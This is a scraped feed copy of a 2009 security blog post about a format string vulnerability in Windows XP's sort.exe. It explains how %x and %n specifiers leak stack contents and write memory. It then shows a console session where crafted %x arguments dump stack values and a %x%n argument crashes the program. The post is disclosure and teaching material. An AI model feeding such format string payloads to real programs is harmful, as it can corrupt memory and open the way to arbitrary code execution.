Angels of security » sort.exe http://angelsofsecurity.com/blog Musings of an infosec renegade Tue, 02 Aug 2011 19:01:53 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 Format string attacks in Windows and sort.exe http://angelsofsecurity.com/blog/2009/01/26/format-string-attacks-in-windows-and-sortexe/ http://angelsofsecurity.com/blog/2009/01/26/format-string-attacks-in-windows-and-sortexe/#comments Mon, 26 Jan 2009 15:39:46 +0000 admin http://angelsofsecurity.com/blog/2009/01/26/format-string-attacks-in-windows-and-sortexe/ Well that was a long and unexpected blogging break. It started because I wanted to write a long and detailed post about the last BGP exploit when I realized how little most security people knew about BGP. Unfortunately I never had time, a bunch of other things demanded my attention, (like real life), and then once I got out of the habit of blogging, it was too easy to just ignore it. I’m back though, and I’ll try to blog regularly, albeit perhaps at a slower rate if real life persists in being as time consuming as its been lately.

Since this blog is coming back from a long hiatus, I think perhaps it’s appropriate to do so by bringing back an old vulnerability from a long hiatus as well. Format String Vulnerabilities have been around since around 1999. The short explanation is that when a C program doesn’t use format specifiers (you know, all those %s things you learned about way back when), but rather just prints a buffer directly, an attacker could put in format specifiers (like %x and %n). %x will just print the next hex number on the stack, so an attacker can view the stack. %n is more insidious – it is used to count the number of characters printed so far and copy that number into an arbitrary memory array. An attacker can use this to overwrite a given memory location (like, say, a return pointer) and execute arbitrary code.

In August of 2004 it was revealed that Windows’ sort.exe had a format string vulnerability. Like most people, I assumed that since the fix for this is trivial (just use a format specifier instead of printing the buffer directly), Microsoft would have fixed it in the next patch release or service pack. Lo and behold, they haven’t. This is a copy and paste from the command shell of my Windows XP machine.

 Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>ver

Microsoft Windows XP [Version 5.1.2600]

C:\>sort %x
7c812f39The system cannot find the file specified.

C:\>sort %x%x
7c812f390The system cannot find the file specified.

C:\>sort %x%x%x
7c812f3900The system cannot find the file specified.

C:\>sort %x%x%x%x
7c812f390078257825The system cannot find the file specified.

C:\>sort %x%x%x%x%x
7c812f39007825782578257825The system cannot find the file specified.

C:\>sort %x%n

(sort.exe crashes as I’ve tried to write data to some random place in memory)

Everyone knows that Microsoft has a reputation for not fixing vulnerabilities unless forced to, but this is bad even by their standards. 4+ years and they haven’t fixed a know format string vulnerability.

]]> http://angelsofsecurity.com/blog/2009/01/26/format-string-attacks-in-windows-and-sortexe/feed/ 0